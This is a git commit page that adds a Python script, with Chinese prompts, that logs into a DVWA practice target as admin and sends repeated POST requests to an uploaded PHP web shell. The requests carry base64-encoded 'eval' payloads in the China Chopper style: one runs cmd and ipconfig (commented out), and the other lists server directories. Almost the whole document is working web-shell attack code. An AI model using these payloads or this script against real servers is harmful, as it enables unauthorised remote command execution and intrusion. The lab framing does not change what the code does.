diff options
| author | [email protected] <[email protected]> | 2019-09-11 18:09:37 +0800 |
|---|---|---|
| committer | [email protected] <[email protected]> | 2019-09-11 18:09:37 +0800 |
| commit | f905594f99d482c7bf9f5cb3a2c9dbad794d1475 (patch) | |
| tree | 60864112aa5466112c7b02f9ba4358a04040beca /high_menace_zhilan_exp.py | |
| parent | a33319f7484793c7fff4c265172512ece1cf9081 (diff) | |
Diffstat (limited to 'high_menace_zhilan_exp.py')
| -rw-r--r-- | high_menace_zhilan_exp.py | 33 |
1 files changed, 33 insertions, 0 deletions
diff --git a/high_menace_zhilan_exp.py b/high_menace_zhilan_exp.py new file mode 100644 index 0000000..856b513 --- /dev/null +++ b/high_menace_zhilan_exp.py @@ -0,0 +1,33 @@ +# -*- coding: utf-8 -*- + +import requests + + +attack_ip=raw_input("输入靶机的IP,如果有端口需要带上端口,例:192.168.0.40:88i/172.86.121.120 \n") +attack_times=int(raw_input("输入攻击的次数 \n")) +s = requests.session() +login_url = 'http://' + attack_ip + '/dvwa/login.php' #自己的靶机需要修改路径 +attack_url='http://' + attack_ip + '/hackable/uploads/1.php' +fangwen_login = { + 'username': 'admin', + 'password': 'admin', + 'Login': 'Login' +} + +# fangwen_xm1= "1=@eval(base64_decode($_POST[action]));&action=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0%2BfCIpOzskcD1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JHM9YmFzZTY0X2RlY29kZSgkX1BPU1RbInoyIl0pOyRkPWRpcm5hbWUoJF9TRVJWRVJbIlNDUklQVF9GSUxFTkFNRSJdKTskYz1zdWJzdHIoJGQsMCwxKT09Ii8iPyItYyBcInskc31cIiI6Ii9jIFwieyRzfVwiIjskcj0ieyRwfSB7JGN9IjtAc3lzdGVtKCRyLiIgMj4mMSIsJHJldCk7cHJpbnQgKCRyZXQhPTApPyIKcmV0PXskcmV0fQoiOiIiOztlY2hvKCJ8PC0iKTtkaWUoKTs%3D&z1=Y21k&z2=Y2QvZCJDOlxkdndhLXYxLjJcaGFja2FibGVcdXBsb2Fkc1wiJmlwY29uZmlnJmVjaG8gW1NdJmNkJmVjaG8gW0Vd" +fangwen_xm2= "1=@eval(base64_decode($_POST[action]));&action=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0%2BfCIpOzskRD1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JEY9QG9wZW5kaXIoJEQpO2lmKCRGPT1OVUxMKXtlY2hvKCJFUlJPUjovLyBQYXRoIE5vdCBGb3VuZCBPciBObyBQZXJtaXNzaW9uISIpO31lbHNleyRNPU5VTEw7JEw9TlVMTDt3aGlsZSgkTj1AcmVhZGRpcigkRikpeyRQPSRELiIvIi4kTjskVD1AZGF0ZSgiWS1tLWQgSDppOnMiLEBmaWxlbXRpbWUoJFApKTtAJEU9c3Vic3RyKGJhc2VfY29udmVydChAZmlsZXBlcm1zKCRQKSwxMCw4KSwtNCk7JFI9Ilx0Ii4kVC4iXHQiLkBmaWxlc2l6ZSgkUCkuIlx0Ii4kRS4iCiI7aWYoQGlzX2RpcigkUCkpJE0uPSROLiIvIi4kUjtlbHNlICRMLj0kTi4kUjt9ZWNobyAkTS4kTDtAY2xvc2VkaXIoJEYpO307ZWNobygifDwtIik7ZGllKCk7&z1=QzpcZHZ3YS12MS4yXGR2d2FcaW1hZ2VzXA%3D%3D" +headers = { +'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', +'Content-Type':'application/x-www-form-urlencoded' + } +dvwa_login = s.post(login_url,data=fangwen_login,headers=headers) +while attack_times>1: + + dvwa_attack=s.post(attack_url,data=fangwen_xm2,headers=headers) + attack_times=attack_times -1 +else: + + dvwa_attack=s.post(attack_url,data=fangwen_xm2,headers=headers) +print ('攻击成功!') + + |